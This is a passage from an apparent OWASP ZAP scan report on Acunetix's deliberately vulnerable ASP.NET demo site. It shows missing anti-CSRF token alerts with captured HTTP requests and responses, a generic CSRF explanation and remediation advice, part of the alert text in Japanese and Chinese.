          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13281
          
          
          Response body (13281 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        19. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Content-Length: 6543
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6543 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN9